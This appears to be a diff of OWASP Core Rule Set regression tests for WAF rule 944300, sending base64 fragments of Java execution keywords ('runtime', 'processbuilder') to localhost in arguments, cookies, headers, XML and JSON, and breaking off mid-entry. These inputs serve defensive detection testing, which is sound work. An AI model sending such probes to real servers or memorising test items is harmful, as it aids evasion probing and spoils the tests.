+ desc: "Request header test includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: cnVudGltZQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-6 + desc: "XML attribute value includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-7 + desc: "XML element value includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "cnVudGltZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-8 + desc: "Nested XML element value includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "cnVudGltZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-9 + desc: "Content-Type text/plain includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=cnVudGltZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-10 + desc: "Content-Type application/json arg value includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"cnVudGltZQ\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-11 + desc: "Content-Type application/json arg name includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"cnVudGltZQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-12 + desc: "Argument test includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=HJ1bnRpbWU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-13 + desc: "Argument name includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "HJ1bnRpbWU=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-14 + desc: "Cookie test includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HJ1bnRpbWU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-15 + desc: "Cookie name includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HJ1bnRpbWU=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-16 + desc: "Request header test includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HJ1bnRpbWU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-17 + desc: "XML attribute value includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-18 + desc: "XML element value includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HJ1bnRpbWU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-19 + desc: "Nested XML element value includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HJ1bnRpbWU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-20 + desc: "Content-Type text/plain includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=HJ1bnRpbWU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-21 + desc: "Content-Type application/json arg value includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"HJ1bnRpbWU\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-22 + desc: "Content-Type application/json arg name includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"HJ1bnRpbWU\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-23 + desc: "Argument test includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=BydW50aW1l" + output: + log_contains: "id \"944300\"" + - test_title: 944300-24 + desc: "Argument name includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "BydW50aW1l=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-25 + desc: "Cookie test includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BydW50aW1l + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-26 + desc: "Cookie name includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BydW50aW1l=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-27 + desc: "Request header test includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BydW50aW1l + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-28 + desc: "XML attribute value includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-29 + desc: "XML element value includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BydW50aW1l" + output: + log_contains: "id \"944300\"" + - test_title: 944300-30 + desc: "Nested XML element value includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BydW50aW1l" + output: + log_contains: "id \"944300\"" + - test_title: 944300-31 + desc: "Content-Type text/plain includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=BydW50aW1l" + output: + log_contains: "id \"944300\"" + - test_title: 944300-32 + desc: "Content-Type application/json arg value includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"BydW50aW1l\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-33 + desc: "Content-Type application/json arg name includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"BydW50aW1l\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-34 + desc: "Argument test includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=cHJvY2Vzc2J1aWxkZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-35 + desc: "Argument name includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "cHJvY2Vzc2J1aWxkZXI=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-36 + desc: "Cookie test includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=cHJvY2Vzc2J1aWxkZXI + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-37 + desc: "Cookie name includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cHJvY2Vzc2J1aWxkZXI=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-38 + desc: "Request header test includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: cHJvY2Vzc2J1aWxkZXI + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-39 + desc: "XML attribute value includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-40 + desc: "XML element value includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "cHJvY2Vzc2J1aWxkZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-41 + desc: "Nested XML element value includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "cHJvY2Vzc2J1aWxkZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-42 + desc: "Content-Type text/plain includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=cHJvY2Vzc2J1aWxkZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-43 + desc: "Content-Type application/json arg value includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"cHJvY2Vzc2J1aWxkZXI\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-44 + desc: "Content-Type application/json arg name includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"cHJvY2Vzc2J1aWxkZXI\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-45 + desc: "Argument test includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=HByb2Nlc3NidWlsZGVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-46 + desc: "Argument name includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "HByb2Nlc3NidWlsZGVy=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-47 + desc: "Cookie test includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HByb2Nlc3NidWlsZGVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-48 + desc: "Cookie name includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HByb2Nlc3NidWlsZGVy=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-49 + desc: "Request header test includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HByb2Nlc3NidWlsZGVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-50 + desc: "XML attribute value includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-51 + desc: "XML element value includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HByb2Nlc3NidWlsZGVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-52 + desc: "Nested XML element value includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HByb2Nlc3NidWlsZGVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-53 + desc: "Content-Type text/plain includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=HByb2Nlc3NidWlsZGVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-54 + desc: "Content-Type application/json arg value includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"HByb2Nlc3NidWlsZGVy\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-55 + desc: "Content-Type application/json arg name includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"HByb2Nlc3NidWlsZGVy\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-56 + desc: "Argument test includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Bwcm9jZXNzYnVpbGRlcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-57 + desc: "Argument name includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: 